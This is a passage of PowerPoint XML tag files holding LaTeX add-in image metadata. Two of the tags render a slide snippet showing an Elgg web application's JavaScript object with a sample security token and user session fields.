  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag230.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="53.61116"/>
  <p:tag name="ORIGINALWIDTH" val="255.0001"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{alltt}&#10;\usepackage{upquote}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;var elgg = \{\dots&#10;  &quot;security&quot;:\{&quot;token&quot;:\{&quot;\underline{  }elgg\underline{ }ts&quot;:1543676484,&#10;                       &quot;\underline{  }elgg\underline{ }token&quot;:&quot;alg7OIvw5Md6iJbXFVgtDA&quot;\}\},&#10;  &quot;session&quot;:\{&quot;user&quot;:\{&quot;guid&quot;:47,\dots\},\dots  &quot;name&quot;:&quot;Alice&quot;,\dots\}&#10;  \dots&#10;\};&#10;\end{alltt}&#10;&#10;&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="18"/>
  <p:tag name="IGUANATEXCURSOR" val="248"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag231.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{alltt}&#10;\usepackage{upquote}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;var elgg = \{\dots&#10;  &quot;security&quot;:\{&quot;token&quot;:\{&quot;\underline{  }elgg\underline{ }ts&quot;:1543676484,&#10;                       &quot;\underline{  }elgg\underline{ }token&quot;:&quot;alg7OIvw5Md6iJbXFVgtDA&quot;\}\},&#10;  &quot;session&quot;:\{&quot;user&quot;:\{&quot;guid&quot;:47,\dots\},\dots  &quot;name&quot;:&quot;Alice&quot;,\dots\}&#10;  \dots&#10;\};&#10;\end{alltt}&#10;&#10;&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="18"/>
  <p:tag name="IGUANATEXCURSOR" val="248"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag232.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag233.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.4028"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag234.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag235.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag236.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.138889"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag237.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.138889"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag238.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.666667"/>
  <p:tag name="ORIGINALWIDTH" val="3.333333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag239.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.708355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag240.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag241.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag242.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9722223"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag243.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.291689"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag244.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag245.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag246.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="2.986133"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag247.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.819467"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag248.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag249.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="2.847244"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="1.931818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag250.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.305556"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag251.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.069466"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag252.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.291689"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag253.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag254.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.708355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag255.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.291689"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag256.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.305556"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag257.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag258.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag259.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.329563"/>
  <p:tag name="ORIGINALWIDTH" val="0.6818182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag260.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag261.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.291689"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag262.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag263.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.638889"/>
  <p:tag name="ORIGINALWIDTH" val="2.638889"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag264.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.291689"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag265.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.2777778"/>
  <p:tag name="ORIGINALWIDTH" val="7.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag266.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag267.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag268.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.138889"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag269.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.138889"/>
  <p:tag name="ORIGINALWIDTH" val="3.680578"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.920472"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag270.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.2777778"/>
  <p:tag name="ORIGINALWIDTH" val="3.958355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag271.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.305556"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag272.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.472222"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag273.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.291689"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag274.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722223"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag275.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="2.569467"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag276.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag277.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag278.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.861111"/>
  <p:tag name="ORIGINALWIDTH" val="3.333333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag279.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.861111"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag280.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.861111"/>
  <p:tag name="ORIGINALWIDTH" val="3.263911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag281.xml><?xml version="1.0" encoding="utf-8"?>
